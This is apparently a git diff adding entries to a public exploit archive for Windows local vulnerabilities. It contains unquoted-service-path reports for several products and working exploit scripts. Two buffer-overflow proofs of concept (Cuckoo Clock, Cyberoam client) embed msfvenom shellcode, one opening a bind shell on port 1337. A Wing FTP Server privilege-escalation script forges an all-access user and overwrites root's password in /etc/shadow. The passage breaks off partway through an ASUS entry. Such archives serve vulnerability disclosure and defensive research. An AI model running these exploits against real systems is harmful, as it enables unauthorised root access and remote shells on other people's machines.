diff --git a/exploits/windows/local/48085.txt b/exploits/windows/local/48085.txt
new file mode 100644
index 000000000..bce39a7ab
--- /dev/null
+++ b/exploits/windows/local/48085.txt
@@ -0,0 +1,27 @@
+# Exploit Title: TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
+# Exploit Author: boku
+# Date: 2020-02-10
+# Vendor Homepage: https://www.weird-solutions.com
+# Software Link: https://www.weird-solutions.com/download/products/tftptv4_retail_IA32.exe
+# Version: 4.6.1273
+# Tested On: Windows 10 (32-bit)
+
+C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "TFTP" | findstr /i /v """
+TFTP Turbo 4       C:\Program Files\TFTP Turbo 4\tftpt.exe           Auto
+
+C:\Users\nightelf>sc qc "TFTP Turbo 4"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: TFTP Turbo 4
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\TFTP Turbo 4\tftpt.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : TFTP Turbo 4
+        DEPENDENCIES       : Nsi
+                           : Afd
+                           : NetBT
+                           : Tcpip
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48087.py b/exploits/windows/local/48087.py
new file mode 100755
index 000000000..883167066
--- /dev/null
+++ b/exploits/windows/local/48087.py
@@ -0,0 +1,65 @@
+# Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow
+# Exploit Author: boku
+# Date: 2020-02-14
+# Vendor Homepage: https://en.softonic.com/author/pxcompany
+# Software Link:   https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download
+# Version:         5.0
+# Tested On:       Windows 10 (32-bit)
+# 
+# Recreate:
+#  1) Install & Open Cuckoo Clock v5.0
+#  2) Right Click app icon (bottom right), click Alarms
+#  3) Click the Add Button
+#  4) Run Python script
+#  5) Open generated poc.txt, then select-all & copy-all
+#  6) Under Schedule, select-all in 'New Alarm' textbox, then paste buffer
+#  7) Press Back Button and shellcode will execute
+
+# EIP Overwrite at 260 Bytes
+# Max Buffer space is 1287 bytes
+# ESP points to payload at offset 264 bytes
+# EBP overwrite at 256 bytes
+
+# badChars  = '\x00\x0d'
+
+try:
+    ebpOffset = '\x41'*256
+    ebp       = '\x42\x42\x42\x42'
+    eip       = '\x16\x05\x03\x10' # 0x10030516 : jmp esp | ascii {PAGE_EXECUTE_READWRITE} [CERBERUS.dll] 
+    # ASLR: False, Rebase: False, SafeSEH: False (C:\Program Files\Parallaxis Cuckoo Clock\CERBERUS.dll)
+    # ESP points to payload at offset 264 bytes
+    # 1019 bytes = Remaining Buffer Length
+    fixStack  = '\x89\xE5'            # mov ebp,esp
+    fixStack  += '\x83\xEC\x30'        # sub esp,byte +0x30
+    # root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x0d' -f python -v shellcode
+    # x86/shikata_ga_nai chosen with final size 216
+    shellcode =  b""
+    shellcode += b"\xdd\xc3\xbb\x9a\x4d\x57\xfa\xd9\x74\x24\xf4"
+    shellcode += b"\x58\x33\xc9\xb1\x30\x83\xe8\xfc\x31\x58\x14"
+    shellcode += b"\x03\x58\x8e\xaf\xa2\x06\x46\xad\x4d\xf7\x96"
+    shellcode += b"\xd2\xc4\x12\xa7\xd2\xb3\x57\x97\xe2\xb0\x3a"
+    shellcode += b"\x1b\x88\x95\xae\xa8\xfc\x31\xc0\x19\x4a\x64"
+    shellcode += b"\xef\x9a\xe7\x54\x6e\x18\xfa\x88\x50\x21\x35"
+    shellcode += b"\xdd\x91\x66\x28\x2c\xc3\x3f\x26\x83\xf4\x34"
+    shellcode += b"\x72\x18\x7e\x06\x92\x18\x63\xde\x95\x09\x32"
+    shellcode += b"\x55\xcc\x89\xb4\xba\x64\x80\xae\xdf\x41\x5a"
+    shellcode += b"\x44\x2b\x3d\x5d\x8c\x62\xbe\xf2\xf1\x4b\x4d"
+    shellcode += b"\x0a\x35\x6b\xae\x79\x4f\x88\x53\x7a\x94\xf3"
+    shellcode += b"\x8f\x0f\x0f\x53\x5b\xb7\xeb\x62\x88\x2e\x7f"
+    shellcode += b"\x68\x65\x24\x27\x6c\x78\xe9\x53\x88\xf1\x0c"
+    shellcode += b"\xb4\x19\x41\x2b\x10\x42\x11\x52\x01\x2e\xf4"
+    shellcode += b"\x6b\x51\x91\xa9\xc9\x19\x3f\xbd\x63\x40\x55"
+    shellcode += b"\x40\xf1\xfe\x1b\x42\x09\x01\x0b\x2b\x38\x8a"
+    shellcode += b"\xc4\x2c\xc5\x59\xa1\xc3\x8f\xc0\x83\x4b\x56"
+    shellcode += b"\x91\x96\x11\x69\x4f\xd4\x2f\xea\x7a\xa4\xcb"
+    shellcode += b"\xf2\x0e\xa1\x90\xb4\xe3\xdb\x89\x50\x04\x48"
+    shellcode += b"\xa9\x70\x67\x0f\x39\x18\x68"
+    Remainder  = '\x46'*(1287-len(ebpOffset+ebp+eip+fixStack+shellcode))
+    payload    = ebpOffset+ebp+eip+fixStack+shellcode+Remainder
+    File      = 'poc.txt'
+    f         = open(File, 'w')
+    f.write(payload)
+    f.close()
+    print File + " created successfully"
+except:
+    print File + ' failed to create'
\ No newline at end of file
diff --git a/exploits/windows/local/48148.py b/exploits/windows/local/48148.py
new file mode 100755
index 000000000..88c1ab4f0
--- /dev/null
+++ b/exploits/windows/local/48148.py
@@ -0,0 +1,71 @@
+# Exploit Title: Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH)
+# Date: 2020-02-28
+# Exploit Author: Andrey Stoykov
+# Version: Cyberoam General Authentication Client 2.1.2.7
+# Tested on: Windows Vista SP2 x86
+
+Steps to Reproduce:
+
+1) Run the POC
+2) Copy the contents of "sploit.txt" into the "Cyberoam Server Address" and click "Check"
+3) Bind TCP shell should spawn on port 1337
+
+# Badchars to be avoided: "\x0a\x00\x0d\x01\x02\x03\x04"
+# msfvenom -p windows/shell_bind_tcp -f c -b "\x0a\x00\x0d\x01\x02\x03\x04" lport=1337 -e x86/alpha_mixed
+
+Exploit POC:
+
+shellcode = ("\x89\xe6\xdd\xc5\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x49\x6c\x6a\x48\x4e\x62\x77\x70\x43\x30\x67\x70\x43\x50\x6f"
+"\x79\x6d\x35\x66\x51\x6f\x30\x71\x74\x6e\x6b\x42\x70\x66\x50"
+"\x6e\x6b\x30\x52\x34\x4c\x6e\x6b\x76\x32\x32\x34\x4e\x6b\x30"
+"\x72\x64\x68\x46\x6f\x6d\x67\x43\x7a\x54\x66\x70\x31\x39\x6f"
+"\x4e\x4c\x77\x4c\x71\x71\x33\x4c\x46\x62\x66\x4c\x37\x50\x4b"
+"\x71\x38\x4f\x54\x4d\x46\x61\x49\x57\x49\x72\x79\x62\x72\x72"
+"\x71\x47\x6c\x4b\x43\x62\x74\x50\x4e\x6b\x70\x4a\x55\x6c\x6c"
+"\x4b\x50\x4c\x77\x61\x73\x48\x4a\x43\x43\x78\x35\x51\x6a\x71"
+"\x43\x61\x6c\x4b\x30\x59\x77\x50\x35\x51\x4e\x33\x6e\x6b\x33"
+"\x79\x67\x68\x69\x73\x64\x7a\x77\x39\x6c\x4b\x75\x64\x4e\x6b"
+"\x75\x51\x4a\x76\x66\x51\x59\x6f\x4e\x4c\x5a\x61\x58\x4f\x66"
+"\x6d\x47\x71\x4a\x67\x45\x68\x49\x70\x73\x45\x59\x66\x47\x73"
+"\x71\x6d\x68\x78\x67\x4b\x61\x6d\x76\x44\x62\x55\x78\x64\x70"
+"\x58\x4e\x6b\x72\x78\x34\x64\x53\x31\x4e\x33\x52\x46\x6c\x4b"
+"\x66\x6c\x52\x6b\x4c\x4b\x76\x38\x67\x6c\x73\x31\x5a\x73\x4c"
+"\x4b\x34\x44\x6e\x6b\x57\x71\x6a\x70\x4e\x69\x33\x74\x36\x44"
+"\x56\x44\x33\x6b\x71\x4b\x70\x61\x31\x49\x50\x5a\x46\x31\x69"
+"\x6f\x79\x70\x53\x6f\x63\x6f\x30\x5a\x6e\x6b\x64\x52\x5a\x4b"
+"\x4c\x4d\x61\x4d\x35\x38\x55\x63\x75\x62\x37\x70\x77\x70\x53"
+"\x58\x62\x57\x71\x63\x76\x52\x43\x6f\x71\x44\x55\x38\x30\x4c"
+"\x72\x57\x31\x36\x64\x47\x39\x6f\x69\x45\x4e\x58\x5a\x30\x75"
+"\x51\x33\x30\x47\x70\x46\x49\x4b\x74\x42\x74\x32\x70\x30\x68"
+"\x36\x49\x6d\x50\x50\x6b\x57\x70\x4b\x4f\x69\x45\x31\x7a\x53"
+"\x38\x70\x59\x72\x70\x4a\x42\x39\x6d\x73\x70\x70\x50\x43\x70"
+"\x66\x30\x42\x48\x6b\x5a\x36\x6f\x49\x4f\x4b\x50\x49\x6f\x79"
+"\x45\x4c\x57\x42\x48\x75\x52\x45\x50\x35\x55\x35\x69\x4e\x69"
+"\x4a\x46\x51\x7a\x52\x30\x62\x76\x36\x37\x50\x68\x4b\x72\x59"
+"\x4b\x55\x67\x55\x37\x79\x6f\x4a\x75\x70\x57\x71\x78\x68\x37"
+"\x79\x79\x67\x48\x79\x6f\x6b\x4f\x4e\x35\x33\x67\x43\x58\x63"
+"\x44\x6a\x4c\x75\x6b\x4b\x51\x39\x6f\x49\x45\x32\x77\x6d\x47"
+"\x52\x48\x70\x75\x70\x6e\x30\x4d\x53\x51\x79\x6f\x6b\x65\x31"
+"\x78\x63\x53\x50\x6d\x42\x44\x67\x70\x6f\x79\x49\x73\x73\x67"
+"\x72\x77\x62\x77\x64\x71\x4a\x56\x32\x4a\x54\x52\x46\x39\x33"
+"\x66\x4a\x42\x79\x6d\x32\x46\x7a\x67\x50\x44\x71\x34\x75\x6c"
+"\x67\x71\x56\x61\x6e\x6d\x33\x74\x51\x34\x52\x30\x38\x46\x53"
+"\x30\x67\x34\x43\x64\x30\x50\x46\x36\x32\x76\x42\x76\x77\x36"
+"\x53\x66\x72\x6e\x42\x76\x50\x56\x43\x63\x36\x36\x71\x78\x53"
+"\x49\x68\x4c\x77\x4f\x6c\x46\x79\x6f\x49\x45\x6d\x59\x4d\x30"
+"\x50\x4e\x70\x56\x63\x76\x79\x6f\x46\x50\x71\x78\x66\x68\x6d"
+"\x57\x75\x4d\x55\x30\x69\x6f\x79\x45\x4f\x4b\x58\x70\x58\x35"
+"\x4f\x52\x71\x46\x52\x48\x6c\x66\x6d\x45\x4d\x6d\x6f\x6d\x6b"
+"\x4f\x69\x45\x75\x6c\x74\x46\x63\x4c\x47\x7a\x6b\x30\x59\x6b"
+"\x39\x70\x31\x65\x77\x75\x6f\x4b\x72\x67\x62\x33\x50\x72\x30"
+"\x6f\x42\x4a\x77\x70\x72\x73\x79\x6f\x59\x45\x41\x41")
+
+buffer = "A"*216 + "\xeb\x10\x90\x90"+ "\x97\x44\x9c\x0f" + "\x90"*500 + shellcode
+buffer += "B"*(16688-216-8-500)
+f = open('sploit.txt', 'w')
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48160.py b/exploits/windows/local/48160.py
new file mode 100755
index 000000000..1090c0e46
--- /dev/null
+++ b/exploits/windows/local/48160.py
@@ -0,0 +1,346 @@
+# Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation
+# Google Dork: intitle:"Wing FTP Server - Web"
+# Date: 2020-03-02
+# Exploit Author: Cary Hooper
+# Vendor Homepage: https://www.wftpserver.com
+# Software Link: https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz
+# Version: v6.2.3
+# Tested on: Ubuntu 18.04, Kali Linux 4, MacOS Catalina, Solaris 11.4 (x86)
+
+
+# Given SSH access to a target machine with Wing FTP Server installed, this program:
+#	- SSH in, forges a FTP user account with full permissions (CVE-2020-8635)
+#	- Logs in to HTTP interface and then edits /etc/shadow (resulting in CVE-2020-8634)
+# Each step can all be done manually with any kind of code execution on target (no SSH)
+# To setup, start SSH service, then run ./wftpserver.  Wing FTP services will start after a domain is created.
+# https://www.hooperlabs.xyz/disclosures/cve-2020-8635.php (writeup)
+
+
+#!/usr/bin/python3
+
+#python3 cve-2020-8635.py -t 192.168.0.2:2222 -u lowleveluser -p demo --proxy http://127.0.0.1:8080
+
+import paramiko,sys,warnings,requests,re,time,argparse
+#Python warnings are the worst
+warnings.filterwarnings("ignore")
+
+#Argument handling begins
+parser = argparse.ArgumentParser(description="Exploit for Wing FTP Server v6.2.3 Local Privilege Escalation",epilog=print(f"Exploit by @nopantrootdance."))
+parser.add_argument("-t", "--target", help="hostname of target, optionally with port specified (hostname:port)",required=True)
+parser.add_argument("-u", "--username", help="SSH username", required=True)
+parser.add_argument("-p", "--password", help="SSH password", required=True)
+parser.add_argument("-v", "--verbose", help="Turn on debug information", action='store_true')
+parser.add_argument("--proxy", help="Send HTTP through a proxy",default=False)
+args = parser.parse_args()
+
+#Global Variables
+global username
+global password
+global proxies
+global port
+global hostname
+global DEBUG
+username = args.username
+password = args.password
+
+#Turn on debug statements
+if args.verbose:
+	DEBUG = True
+else:
+	DEBUG = False
+
+#Handle nonstandard SSH port
+if ':' in args.target:
+	socket = args.target.split(':')
+	hostname = socket[0]
+	port = socket[1]
+else:
+	hostname = args.target
+	port = "22"
+
+#Prepare proxy dict (for Python requests)
+if args.proxy:
+	if ("http://" not in args.proxy) and ("https://" not in args.proxy):
+		print(f"[!] Invalid proxy.  Proxy must have http:// or https:// {proxy}")
+		sys.exit(1)
+	proxies = {'http':args.proxy,'https':args.proxy}
+else:
+	proxies = {}
+#Argument handling ends
+
+#This is what a <username>.xml file looks like.
+#Gives full permission to user (h00p:h00p) for entire filesystem '/'.
+#Located in $_WFTPROOT/Data/Users/
+evilUserXML = """<?xml version="1.0" ?>
+<USER_ACCOUNTS Description="Wing FTP Server User Accounts">
+    <USER>
+        <UserName>h00p</UserName>
+        <EnableAccount>1</EnableAccount>
+        <EnablePassword>1</EnablePassword>
+        <Password>d28f47c0483d392ca2713fe7e6f54089</Password>
+        <ProtocolType>63</ProtocolType>
+        <EnableExpire>0</EnableExpire>
+        <ExpireTime>2020-02-25 18:27:07</ExpireTime>
+        <MaxDownloadSpeedPerSession>0</MaxDownloadSpeedPerSession>
+        <MaxUploadSpeedPerSession>0</MaxUploadSpeedPerSession>
+        <MaxDownloadSpeedPerUser>0</MaxDownloadSpeedPerUser>
+        <MaxUploadSpeedPerUser>0</MaxUploadSpeedPerUser>
+        <SessionNoCommandTimeOut>5</SessionNoCommandTimeOut>
+        <SessionNoTransferTimeOut>5</SessionNoTransferTimeOut>
+        <MaxConnection>0</MaxConnection>
+        <ConnectionPerIp>0</ConnectionPerIp>
+        <PasswordLength>0</PasswordLength>
+        <ShowHiddenFile>0</ShowHiddenFile>
+        <CanChangePassword>0</CanChangePassword>
+        <CanSendMessageToServer>0</CanSendMessageToServer>
+        <EnableSSHPublicKeyAuth>0</EnableSSHPublicKeyAuth>
+        <SSHPublicKeyPath></SSHPublicKeyPath>
+        <SSHAuthMethod>0</SSHAuthMethod>
+        <EnableWeblink>1</EnableWeblink>
+        <EnableUplink>1</EnableUplink>
+        <CurrentCredit>0</CurrentCredit>
+        <RatioDownload>1</RatioDownload>
+        <RatioUpload>1</RatioUpload>
+        <RatioCountMethod>0</RatioCountMethod>
+        <EnableRatio>0</EnableRatio>
+        <MaxQuota>0</MaxQuota>
+        <CurrentQuota>0</CurrentQuota>
+        <EnableQuota>0</EnableQuota>
+        <NotesName></NotesName>
+        <NotesAddress></NotesAddress>
+        <NotesZipCode></NotesZipCode>
+        <NotesPhone></NotesPhone>
+        <NotesFax></NotesFax>
+        <NotesEmail></NotesEmail>
+        <NotesMemo></NotesMemo>
+        <EnableUploadLimit>0</EnableUploadLimit>
+        <CurLimitUploadSize>0</CurLimitUploadSize>
+        <MaxLimitUploadSize>0</MaxLimitUploadSize>
+        <EnableDownloadLimit>0</EnableDownloadLimit>
+        <CurLimitDownloadLimit>0</CurLimitDownloadLimit>
+        <MaxLimitDownloadLimit>0</MaxLimitDownloadLimit>
+        <LimitResetType>0</LimitResetType>
+        <LimitResetTime>1580092048</LimitResetTime>
+        <TotalReceivedBytes>0</TotalReceivedBytes>
+        <TotalSentBytes>0</TotalSentBytes>
+        <LoginCount>0</LoginCount>
+        <FileDownload>0</FileDownload>
+        <FileUpload>0</FileUpload>
+        <FailedDownload>0</FailedDownload>
+        <FailedUpload>0</FailedUpload>
+        <LastLoginIp></LastLoginIp>
+        <LastLoginTime>2020-01-26 18:27:28</LastLoginTime>
+        <EnableSchedule>0</EnableSchedule>
+        <Folder>
+            <Path>/</Path>
+            <Alias>/</Alias>
+            <Home_Dir>1</Home_Dir>
+            <File_Read>1</File_Read>
+            <File_Write>1</File_Write>
+            <File_Append>1</File_Append>
+            <File_Delete>1</File_Delete>
+            <Directory_List>1</Directory_List>
+            <Directory_Rename>1</Directory_Rename>
+            <Directory_Make>1</Directory_Make>
+            <Directory_Delete>1</Directory_Delete>
+            <File_Rename>1</File_Rename>
+            <Zip_File>1</Zip_File>
+            <Unzip_File>1</Unzip_File>
+        </Folder>
+    </USER>
+</USER_ACCOUNTS>
+"""
+
+#Verbosity function.  
+def log(string):
+	if DEBUG != False:
+		print(string)
+
+#Checks to see which URL is hosting Wing FTP
+#Returns a URL, probably. HTTPS preferred.  empty url is checked in main()
+def checkHTTP(hostname):
+	protocols= ["http://","https://"]
+	for protocol in protocols:
+		try:
+			log(f"Testing HTTP service {protocol}{hostname}")
+			response = requests.get(protocol + hostname, verify=False, proxies=proxies)
+			try:
+				#Server: Wing FTP Server
+				if "Wing FTP Server" in response.headers['Server']:
+					print(f"[!] Wing FTP Server found at {protocol}{hostname}")
+					url = protocol + hostname
+			except:
+				print("")
+		except Exception as e:
+			print(f"[*] Server is not running Wing FTP web services on {protocol}: {e}")
+	return url
+
+#Log in to the HTTP interface.  Returns cookie
+def getCookie(url,webuser,webpass,headers):
+	log("getCookie")
+	loginURL = f"{url}/loginok.html"
+	data = {"username": webuser, "password": webpass, "username_val": webuser, "remember": "true", "password_val": webpass, "submit_btn": " Login "}
+	response = requests.post(loginURL, headers=headers, data=data, verify=False, proxies=proxies)
+	ftpCookie = response.headers['Set-Cookie'].split(';')[0]
+	print(f"[!] Successfully logged in!  Cookie is {ftpCookie}")
+	cookies = {"UID":ftpCookie.split('=')[1]}
+	log("return getCookie")
+	return cookies
+
+#Change directory within the web interface.
+#The actual POST request changes state.  We keep track of that state in the returned directorymem array.
+def chDir(url,directory,headers,cookies,directorymem):
+	log("chDir")
+	data = {"dir": directory}
+	print(f"[*] Changing directory to {directory}")
+	chdirURL = f"{url}/chdir.html"
+	requests.post(chdirURL, headers=headers, cookies=cookies, data=data, verify=False, proxies=proxies)
+	log(f"Directorymem is nonempty. --> {directorymem}")
+	log("return chDir")
+	directorymem = directorymem + "|" + directory
+	return directorymem 
+
+#The application has a silly way of keeping track of paths.
+#This function returns the current path as dirstring.
+def prepareStupidDirectoryString(directorymem,delimiter):
+	log("prepareStupidDirectoryString")
+	dirstring = ""
+	directoryarray = directorymem.split('|')
+	log(f"directoryarray is {directoryarray}")
+	for item in directoryarray:
+		if item != "":
+			dirstring += delimiter + item
+	log("return prepareStupidDirectoryString")
+	return dirstring
+
+#Downloads a given file from the server.  By default, it runs as root.
+#Returns the content of the file as a string.
+def downloadFile(file,url,headers,cookies,directorymem):
+	log("downloadFile")
+	print(f"[*] Downloading the {file} file...")
+	dirstring = prepareStupidDirectoryString(directorymem,"$2f")  #Why wouldn't you URL-encode?!
+	log(f"directorymem is {directorymem} and dirstring is {dirstring}")
+	editURL = f"{url}/editor.html?dir={dirstring}&filename={file}&r=0.88304407485768"
+	response = requests.get(editURL, cookies=cookies, verify=False, proxies=proxies)
+	filecontent = re.findall(r'<textarea id="textedit" style="height:520px; width:100%;">(.*?)</textarea>',response.text,re.DOTALL)[0]
+	log(f"downloaded file is: {filecontent}")
+	log("return downloadFile")
+	return filecontent,editURL
+
+#Saves a given file to the server (or overwrites one).  By default it saves a file with
+#644 permission owned by root.
+def saveFile(newfilecontent,file,url,headers,cookies,referer,directorymem):
+	log("saveFile")
+	log(f"Directorymem is {directorymem}")
+	saveURL = f"{url}/savefile.html"
+	headers = {"Content-Type": "text/plain;charset=UTF-8", "Referer": referer}
+	dirstring = prepareStupidDirectoryString(directorymem,"/")
+	log(f"Stupid Directory string is {dirstring}")
+	data = {"charcode": "0", "dir": dirstring, "filename": file, "filecontent": newfilecontent}
+	requests.post(saveURL, headers=headers, cookies=cookies, data=data, verify=False)
+	log("return saveFile")
+
+#Other methods may be more stable, but this works.
+#"You can't argue with a root shell" - FX
+#Let me know if you know of other ways to increase privilege by overwriting or creating files.  Another way is to overwrite
+#the Wing FTP admin file, then leverage the lua interpreter in the administrative interface which runs as root (YMMV).
+#Mind that in this version of Wing FTP, files will be saved with umask 111.  This makes changing /etc/sudoers infeasible.
+
+#This routine overwrites the shadow file
+def overwriteShadow(url):
+	log("overwriteShadow")
+	headers = {"Content-Type": "application/x-www-form-urlencoded"}
+	#Grab cookie from server.
+	cookies = getCookie(url=url,webuser="h00p",webpass="h00p",headers=headers)
+
+	#Chdir a few times, starting in the user's home directory until we arrive at the target folder
+	directorymem = chDir(url=url,directory="etc",headers=headers,cookies=cookies,directorymem="")
+	
+	#Download the target file.
+	shadowfile,referer = downloadFile(file="shadow",url=url,headers=headers,cookies=cookies,directorymem=directorymem)
+
+	# openssl passwd -1 -salt h00ph00p h00ph00p
+	rootpass = "$1$h00ph00p$0cUgaHnnAEvQcbS6PCMVM0"
+	rootpass = "root:" + rootpass + ":18273:0:99999:7:::"
+
+	#Create new shadow file with different root password & save
+	newshadow = re.sub("root(.*):::",rootpass,shadowfile)
+	print("[*] Swapped the password hash...")
+	saveFile(newfilecontent=newshadow,file="shadow",url=url,headers=headers,cookies=cookies,referer=referer,directorymem=directorymem)
+	print("[*] Saved the forged shadow file...")
+	log("exit overwriteShadow")
+
+def main():
+	log("main")
+	try:
+		#Create ssh connection to target with paramiko
+		client = paramiko.SSHClient()
+		client.load_system_host_keys()
+		client.set_missing_host_key_policy(paramiko.WarningPolicy)
+		try: 
+			client.connect(hostname, port=port, username=username, password=password)
+		except:
+			print(f"Failed to connect to {hostname}:{port} as user {username}.")
+		
+		#Find wftpserver directory
+		print(f"[*] Searching for Wing FTP root directory. (this may take a few seconds...)")
+		stdin, stdout, stderr = client.exec_command("find / -type f -name 'wftpserver'")
+		wftpDir = stdout.read().decode("utf-8").split('\n')[0].rsplit('/',1)[0]
+		print(f"[!] Found Wing FTP directory: {wftpDir}")
+		#Find name of <domain>
+		stdin, stdout, stderr = client.exec_command(f"find {wftpDir}/Data/ -type d -maxdepth 1")
+		lsresult = stdout.read().decode("utf-8").split('\n')
+		#Checking if wftpserver is actually configured.  If you're using this script, it probably is.
+		print(f"[*] Determining if the server has been configured.")
+		domains = []
+		for item in lsresult[:-1]:
+			item = item.rsplit('/',1)[1]
+			if item !="_ADMINISTRATOR" and item != "":
+				domains.append(item)
+				print(f"[!] Success. {len(domains)} domain(s) found! Choosing the first: {item}")
+		domain = domains[0]
+		#Check if the users folder exists
+		userpath = wftpDir + "/Data/" + domain
+		print(f"[*] Checking if users exist.")
+		stdin, stdout, stderr = client.exec_command(f"file {userpath}/users")
+		if "No such file or directory" in stdout.read().decode("utf-8"):
+			print(f"[*] Users directory does not exist.  Creating folder /users")
+			#Create users folder
+			stdin, stdout, stderr = client.exec_command(f"mkdir {userpath}/users")
+		#Create user.xml file
+		print("[*] Forging evil user (h00p:h00p).")
+		stdin, stdout, stderr = client.exec_command(f"echo '{evilUserXML}' > {userpath}/users/h00p.xml")
+		#Now we can log into the FTP web app with h00p:h00p
+		
+		url = checkHTTP(hostname)
+		#Check that url isn't an empty string (and that its a valid URL)
+		if "http" not in url:
+			print(f"[!] Exiting... cannot access web interface.")
+			sys.exit(1)
+
+		#overwrite root password
+		try:
+			overwriteShadow(url)
+			print(f"[!] Overwrote root password to h00ph00p.")
+		except Exception as e:
+			print(f"[!] Error: cannot overwrite /etc/shadow: {e}")
+
+		#Check to make sure the exploit worked.
+		stdin, stdout, stderr = client.exec_command("cat /etc/shadow | grep root")
+		out = stdout.read().decode('utf-8')
+		err = stderr.read().decode('utf-8')
+
+		log(f"STDOUT - {out}")
+		log(f"STDERR - {err}")
+		if "root:$1$h00p" in out:
+			print(f"[*] Success!  The root password has been successfully changed.")
+			print(f"\n\tssh {username}@{hostname} -p{port}")
+			print(f"\tThen: su root (password is h00ph00p)")
+		else:
+			print(f"[!] Something went wrong... SSH in to manually check /etc/shadow.  Permissions may have been changed to 666.")
+
+		log("exit prepareServer")
+	finally:
+		client.close()
+
+main()
\ No newline at end of file
diff --git a/exploits/windows/local/48171.txt b/exploits/windows/local/48171.txt
new file mode 100644
index 000000000..88d17348a
--- /dev/null
+++ b/exploits/windows/local/48171.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Iskysoft Application Framework Service 2.4.3.241 - 'IsAppService' Unquoted Service Path
+# Discovery by: Alejandro Reyes
+# Discovery Date: 2020-03-05
+# Vendor Homepage: https://www.iskysoft.us
+# Software Link : https://www.iskysoft.us/lp/filmora-video-editor/?gclid=EAIaIQobChMIo-WL-Z6h5wIVwR0YCh3O7QYsEAAYAiAAEgJ_m_D_BwE
+# Tested Version: 2.4.3.241
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 
+
+# Step to discover Unquoted Service Path: 
+
+
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr "Iskysoft" | findstr /i /v """
+
+Iskysoft Application Framework Service     IsAppService    C:\Program Files (x86)\Iskysoft\IAF\2.4.3.241\IsAppService.exe    Auto
+
+# Service info:
+
+C:\WINDOWS\system32>sc qc "IsAppService"
+
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: IsAppService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Iskysoft\IAF\2.4.3.241\IsAppService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Iskysoft Application Framework Service
+        DEPENDENCIES       : RPCSS
+
+
+# Exploit:
+
+# A successful attempt would require the local user to be able to insert their code in the 
+# system root path undetected by the OS or other security applications where it could 
+# potentially be executed during application startup or reboot. If successful, the local 
+# user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48172.txt b/exploits/windows/local/48172.txt
new file mode 100644
index 000000000..55aa9e657
--- /dev/null
+++ b/exploits/windows/local/48172.txt
@@ -0,0 +1,36 @@
+# Exploit Title: SpyHunter 4 - 'SpyHunter 4 Service' Unquoted Service Path
+# Discovery by: Alejandro Reyes
+# Discovery Date: 2020-03-05
+# Vendor Homepage: https://www.enigmasoftware.com
+# Software Link : https://www.enigmasoftware.com/spyhunter-download-instructions/
+# Tested Version: 4
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr "SpyHunter" | findstr /i /v """
+
+SpyHunter 4 Service    SpyHunter 4 Service          C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe                                                                                                                                                                                                                   Auto
+
+# Service info:
+
+C:\>sc qc "IsAppService"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SpyHunter 4 Service
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
+        LOAD_ORDER_GROUP   : Base
+        TAG                : 0
+        DISPLAY_NAME       : SpyHunter 4 Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the 
+# system root path undetected by the OS or other security applications where it could 
+# potentially be executed during application startup or reboot. If successful, the local 
+# user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48173.txt b/exploits/windows/local/48173.txt
new file mode 100644
index 000000000..ad30d8590
--- /dev/null
+++ b/exploits/windows/local/48173.txt
@@ -0,0 +1,36 @@
+# Exploit Title: ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path
+# Discovery by: Oscar Flores
+# Discovery Date: 2020-03-05
+# Vendor Homepage: https://www.asus.com/
+# Software Link : https://www.microsoft.com/en-us/p/asus-giftbox/9wzdncrdrb6s?activetab=pivot:overviewtab 
+# Tested Version: 1.1.1.127
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home Single Language
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr "ASUSGift" | findstr /i /v """
+
